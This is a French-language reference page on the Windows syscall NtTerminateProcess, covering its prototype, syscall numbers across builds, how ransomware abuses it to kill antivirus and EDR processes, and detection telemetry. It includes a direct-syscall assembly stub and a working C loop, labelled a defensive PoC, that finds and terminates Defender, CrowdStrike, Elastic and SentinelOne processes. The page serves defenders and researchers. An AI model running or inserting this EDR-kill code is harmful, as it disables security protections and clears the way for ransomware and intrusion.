NtTerminateProcess
Termine un processus cible et tous ses threads avec un code de sortie donné.
Prototype
NTSTATUS NtTerminateProcess( HANDLE ProcessHandle, NTSTATUS ExitStatus );
Arguments
| Name | Type | Dir | Description |
|---|---|---|---|
| ProcessHandle | HANDLE | in | Handle vers le processus à terminer. Requiert PROCESS_TERMINATE. NULL signifie « terminer tous les threads du processus courant sauf l'appelant ». |
| ExitStatus | NTSTATUS | in | Code de sortie rapporté par GetExitCodeProcess et enregistré dans l'objet processus. |
IDs de syscalls par version de Windows
| Version de Windows | ID de syscall | Build |
|---|---|---|
| Win10 1507 | 0x2C | win10-1507 |
| Win10 1607 | 0x2C | win10-1607 |
| Win10 1703 | 0x2C | win10-1703 |
| Win10 1709 | 0x2C | win10-1709 |
| Win10 1803 | 0x2C | win10-1803 |
| Win10 1809 | 0x2C | win10-1809 |
| Win10 1903 | 0x2C | win10-1903 |
| Win10 1909 | 0x2C | win10-1909 |
| Win10 2004 | 0x2C | win10-2004 |
| Win10 20H2 | 0x2C | win10-20h2 |
| Win10 21H1 | 0x2C | win10-21h1 |
| Win10 21H2 | 0x2C | win10-21h2 |
| Win10 22H2 | 0x2C | win10-22h2 |
| Win11 21H2 | 0x2C | win11-21h2 |
| Win11 22H2 | 0x2C | win11-22h2 |
| Win11 23H2 | 0x2C | win11-23h2 |
| Win11 24H2 | 0x2C | win11-24h2 |
| Server 2016 | 0x2C | winserver-2016 |
| Server 2019 | 0x2C | winserver-2019 |
| Server 2022 | 0x2C | winserver-2022 |
| Server 2025 | 0x2C | winserver-2025 |
Module noyau
APIs liées
Stub du syscall
4C 8B D1 mov r10, rcx B8 2C 00 00 00 mov eax, 0x2C F6 04 25 08 03 FE 7F 01 test byte ptr [0x7FFE0308], 1 75 03 jne short +3 0F 05 syscall C3 ret CD 2E int 2Eh C3 ret
Notes non documentées
NtTerminateProcess garde le SSN `0x2C` sur tous les builds Windows 10 / 11 / Server. C'est l'implémentation noyau derrière TerminateProcess / ExitProcess et il est aussi appelé implicitement par `_exit` du runtime C et par les finalizers SEH d'exception non gérée. L'appeler avec ProcessHandle == NULL est un raccourci documenté pour tuer tous les threads du processus courant hormis l'appelant — la seconde moitié du teardown d'`ExitProcess`.
Usage courant par les malwares
L'abus définitoire est le **kill d'EDR / AV** (T1562.001). Les ransomwares modernes (Conti, LockBit, BlackCat/ALPHV, Royal, Akira) et les frameworks post-exploitation associent couramment un driver vulnérable BYOVD (zemana, gmer, RTCore64) avec un binaire usermode qui parcourt la liste des processus, matche contre une allowlist hardcodée de noms d'EDR (MsMpEng, Sense, CSFalconService, elastic-agent, ...) et soit descend au noyau pour invoquer directement ZwTerminateProcess, soit — une fois le callback de protection de l'EDR neutralisé — appelle NtTerminateProcess depuis l'usermode avec PROCESS_TERMINATE. Autres usages : interrompre un processus helper injecté après livraison de payload de mouvement latéral, et droppers auto-destructifs après passage au second stage.
Opportunités de détection
Les callbacks PsSetCreateProcessNotifyRoutineEx se déclenchent à la sortie de processus avec `Create` == FALSE et incluent à la fois le terminateur et la PID victime ; c'est la télémétrie reine. Sysmon Event ID 5 (`ProcessTerminate`) est bien plus léger et n'a pas le champ terminateur. ETW `Microsoft-Windows-Kernel-Process/ProcessStop` fournit les mêmes données. Règle haute fidélité : tout processus non System, non csrss qui termine un processus dont le chemin image vit sous `Program Files\Windows Defender`, `Program Files\Microsoft\Windows Defender Advanced Threat Protection`, `Program Files\CrowdStrike`, `Program Files\SentinelOne` ou racines EDR similaires. Coupler avec la télémétrie d'auto-protection EDR (tentatives de violation PPL sur le `MsMpEng.exe` de Defender).
Exemples de syscalls directs
asmx64 direct stub
; Direct syscall stub for NtTerminateProcess (SSN 0x2C, all builds)
NtTerminateProcess PROC
mov r10, rcx ; syscall convention
mov eax, 2Ch ; SSN
syscall
ret
NtTerminateProcess ENDPcEDR kill loop (defensive PoC)
// Defensive PoC: enumerate processes, match against an EDR allowlist,
// and call NtTerminateProcess directly. Assumes prerequisites (token theft
// to SYSTEM, EDR protection callback already stripped via BYOVD) are met.
#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>
typedef NTSTATUS (NTAPI *pNtTerminateProcess)(HANDLE, NTSTATUS);
static const wchar_t *kTargets[] = {
L"MsMpEng.exe", L"MsSense.exe", L"CSFalconService.exe",
L"elastic-agent.exe", L"SentinelAgent.exe", NULL,
};
void KillEDRs(void) {
pNtTerminateProcess NtTerminateProcess = (pNtTerminateProcess)GetProcAddress(
GetModuleHandleA("ntdll.dll"), "NtTerminateProcess");
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32W pe = { sizeof pe };
for (BOOL ok = Process32FirstW(snap, &pe); ok; ok = Process32NextW(snap, &pe)) {
for (size_t i = 0; kTargets[i]; ++i) {
if (_wcsicmp(pe.szExeFile, kTargets[i]) == 0) {
HANDLE h = OpenProcess(PROCESS_TERMINATE, FALSE, pe.th32ProcessID);
if (h) { NtTerminateProcess(h, 0); CloseHandle(h); }
}
}
}
CloseHandle(snap);
}rustself-destruct on completion
// Cargo: windows-sys = "0.59" (Win32_System_Threading, Win32_Foundation)
use windows_sys::Win32::Foundation::HANDLE;
use windows_sys::Win32::System::Threading::GetCurrentProcess;
extern "system" {
fn NtTerminateProcess(ProcessHandle: HANDLE, ExitStatus: i32) -> i32;
}
pub fn self_destruct(code: i32) -> ! {
unsafe { NtTerminateProcess(GetCurrentProcess(), code); }
loop {}
}Mappings MITRE ATT&CK
Last verified: 2026-05-20